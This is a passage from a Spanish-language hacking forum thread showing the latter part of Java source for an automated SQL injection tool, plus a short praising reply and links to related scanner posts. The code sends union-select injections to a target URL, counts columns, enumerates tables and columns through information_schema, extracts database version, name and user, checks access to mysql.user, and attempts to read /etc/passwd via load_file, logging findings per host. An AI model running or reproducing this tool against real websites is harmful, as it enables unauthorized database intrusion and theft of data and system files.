  619.                uno = Pattern.compile("K0BRA(.*)K0BRA");
  620.                dos = uno.matcher(code);
  621.  
  622.                if (dos.find()) {
  623.                    System.out.println("[+] Column Found : " + dos.group(1));
  624.                    savefile(urla, "[+] Column Found : " + dos.group(1));
  625.                }
  626.  
  627.            }
  628.  
  629.        } else {
  630.            System.out.println("[-] Not Found");
  631.        }
  632.  
  633.    }
  634.  
  635.    private static void schematables(String urla) throws Exception {
  636.  
  637.        String web1;
  638.        String web2;
  639.        String code;
  640.        int x;
  641.        Pattern uno = null;
  642.        Matcher dos = null;
  643.  
  644.        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
  645.        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
  646.  
  647.        System.out.println("\n[+] Getting tables ....\n");
  648.  
  649.        code = toma(web1 + "+from+information_schema.tables--");
  650.  
  651.        uno = Pattern.compile("K0BRA(.*)K0BRA");
  652.        dos = uno.matcher(code);
  653.  
  654.        if (dos.find()) {
  655.            System.out.println("[+] Tables Found : " + dos.group(1) + "\n");
  656.  
  657.            savefile(urla, "");
  658.  
  659.            int finals = Integer.parseInt(dos.group(1));
  660.  
  661.            for (x = 0; x <= finals; x = x + 1) {
  662.  
  663.                code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");
  664.  
  665.                uno = Pattern.compile("K0BRA(.*)K0BRA");
  666.                dos = uno.matcher(code);
  667.  
  668.                if (dos.find()) {
  669.                    System.out.println("[+] Table Found : " + dos.group(1));
  670.                    savefile(urla, "[+] Table Found : " + dos.group(1));
  671.                }
  672.  
  673.            }
  674.  
  675.        } else {
  676.            System.out.println("[-] Not Found");
  677.        }
  678.  
  679.    }
  680.  
  681.    private static void scan(String urla) throws Exception {
  682.  
  683.        String codex;
  684.        String target;
  685.  
  686.        Pattern uno = null;
  687.        Matcher dos = null;
  688.  
  689.        target = urla;
  690.  
  691.        System.out.println("\n[+] Checking ...\n");
  692.  
  693.        codex = toma(target + "-1+union+select+666--");
  694.  
  695.        uno = Pattern.compile("The used SELECT statements have a different number of columns");
  696.        dos = uno.matcher(codex);
  697.  
  698.        if (dos.find()) {
  699.            System.out.println("[+] Scanning ...\n");
  700.  
  701.            int x;
  702.            String urlfinal;
  703.            String otrofinal;
  704.            String code;
  705.            String formariny;
  706.            String otroformar;
  707.            String link;
  708.  
  709.            urlfinal = "";
  710.            formariny = "";
  711.  
  712.            for (x = 1; x <= 5; x = x + 1) {
  713.  
  714. //urlfinal = urlfinal+x+",";
  715.                urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
  716.                formariny = formariny + x + ",";
  717.  
  718.                otrofinal = urlfinal;
  719.                otroformar = formariny;
  720.  
  721.                otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
  722.                otroformar = otroformar.substring(0, otroformar.length() - 1);
  723.  
  724.                code = toma(target + "-1+union+select+" + otrofinal);
  725.  
  726.                uno = Pattern.compile("RATSXPDOWN(\\d+)");
  727.                dos = uno.matcher(code);
  728.  
  729.                if (dos.find()) {
  730.  
  731.                    otroformar = otroformar.replace(dos.group(1), "hackman");
  732.  
  733.                    link = target + "-1+union+select+" + otroformar;
  734.  
  735.                    System.out.println("[Target] : " + link);
  736.                    System.out.println("[Limit] : The site has " + x + " columns");
  737.                    System.out.println("[Data] : The number " + dos.group(1) + " print data");
  738.  
  739.                    savefile(link, "\r\n" + "[Target] : " + link);
  740.                    savefile(link, "[Limit] : The site has " + x + " columns");
  741.                    savefile(link, "[Data] : The number " + dos.group(1) + " print data");
  742.  
  743.                    manejo(link);
  744.  
  745.                    System.exit(1);
  746.  
  747.                }
  748.  
  749.            }
  750.            System.out.println("[-] Error");
  751.        } else {
  752.            System.out.println("[-] Not vulnerable");
  753.        }
  754.  
  755.    }
  756.  
  757.    private static void details(String urla) throws Exception {
  758.  
  759.        String concat;
  760.        String code;
  761.  
  762.        Pattern uno = null;
  763.        Matcher dos = null;
  764.  
  765.        concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";
  766.  
  767.        urla = urla.replace("hackman", concat);
  768.  
  769.        System.out.println("\n[+] Searching informaion ...\n");
  770.  
  771.        code = toma(urla);
  772.  
  773.        uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
  774.        dos = uno.matcher(code);
  775.  
  776.        if (dos.find()) {
  777.            System.out.println("[+] DB Version : " + dos.group(1));
  778.            System.out.println("[+] DB Name : " + dos.group(2));
  779.            System.out.println("[+] Username : " + dos.group(3));
  780.  
  781.            savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
  782.            savefile(urla, "[+] DB Name : " + dos.group(2));
  783.            savefile(urla, "[+] Username : " + dos.group(3));
  784.  
  785.        } else {
  786.            System.out.println("[-] Not found any data");
  787.        }
  788.  
  789.        urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");
  790.  
  791.        code = toma(urla + "+from+information_schema.tables--");
  792.        uno = Pattern.compile("ERTOR854");
  793.        dos = uno.matcher(code);
  794.  
  795.        if (dos.find()) {
  796.            System.out.println("[+] information_schema : on");
  797.            savefile(urla, "[+] information_schema : on");
  798.        } else {
  799.            System.out.println("[-] information_schema : off");
  800.        }
  801.  
  802.        code = toma(urla + "+from+mysql.user--");
  803.        uno = Pattern.compile("ERTOR854");
  804.        dos = uno.matcher(code);
  805.  
  806.        if (dos.find()) {
  807.            System.out.println("[+] mysqluser : on");
  808.            savefile(urla, "[+] mysqluser : on");
  809.        } else {
  810.            System.out.println("[-] mysquser : off");
  811.        }
  812.  
  813.        urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");
  814.  
  815.        code = toma(urla);
  816.        uno = Pattern.compile("ERTOR854");
  817.        dos = uno.matcher(code);
  818.  
  819.        if (dos.find()) {
  820.            System.out.println("[-] load_file : on");
  821.            savefile(urla, "[-] load_file : on");
  822.        } else {
  823.            System.out.println("[-] load_file : off");
  824.        }
  825.  
  826.    }
  827.  
  828.    private static void savefile(String nombre, String texto) throws Exception {
  829.  
  830.        String formar;
  831.  
  832.        URL h = new URL(nombre);
  833.  
  834.        formar = "logs/" + h.getHost() + ".txt";
  835.  
  836.        FileWriter writer = new FileWriter(formar, true);
  837.        writer.write(texto + "\r\n");
  838.        writer.close();
  839.  
  840.    }
  841.  
  842.    private static String toma(String urla) throws Exception {
  843.  
  844.        String re;
  845.  
  846.        StringBuffer conte = new StringBuffer(40);
  847.  
  848.        URL url = new URL(urla);
  849.        URLConnection hc = url.openConnection();
  850.        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  851.  
  852.        BufferedReader nave = new BufferedReader(
  853.                new InputStreamReader(hc.getInputStream()));
  854.  
  855.        while ((re = nave.readLine()) != null) {
  856.            conte.append(re);
  857.        }
  858.  
  859.        nave.close();
  860.  
  861.        return conte.toString();
  862.  
  863.    }
  864.  
  865.    public static String encodehex(String text) {
  866.  
  867. //Thanks to Katarina Majetic
  868. //Based on http://www.dzone.com/snippets/encode-string-hex
  869.  
  870.        byte[] z = text.getBytes();
  871.        StringBuffer h = new StringBuffer();
  872.        String l;
  873.        int n;
  874.        int a = z.length;
  875.        int u;
  876.  
  877.        for (n = 0; n < a; n++) {
  878.            u = z[n] & 0x000000FF;
  879.            l = Integer.toHexString(u);
  880.            h.append(l);
  881.        }
  882.        return "0x" + h.toString();
  883.    }
  884. }
  885.  
  886. //The End ?
  887.  


En línea

Slider324

Desconectado Desconectado

Mensajes: 45


Ver Perfil
Re: [Java] SQLI Scanner 0.2
« Respuesta #1 en: 22 Enero 2013, 16:27 pm »

wow voy a darle una ojeada  ;-) ;-) muy buen trabajo


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ruby] SQLI Scanner
Scripting
BigBear 0 2,100 Último mensaje 7 Octubre 2011, 01:32 am
por BigBear
[Java] SQL Scanner 0.1
Java
BigBear 2 2,452 Último mensaje 13 Enero 2013, 21:34 pm
por BigBear
[C#] SQLI Scanner 0.4
.NET (C#, VB.NET, ASP)
BigBear 0 2,847 Último mensaje 18 Julio 2014, 01:36 am
por BigBear
[Ruby] SQLI Scanner 0.4
Scripting
BigBear 0 1,832 Último mensaje 7 Agosto 2015, 22:25 pm
por BigBear
[Java] SQLI Scanner 0.4
Java
BigBear 0 1,575 Último mensaje 5 Marzo 2016, 16:15 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines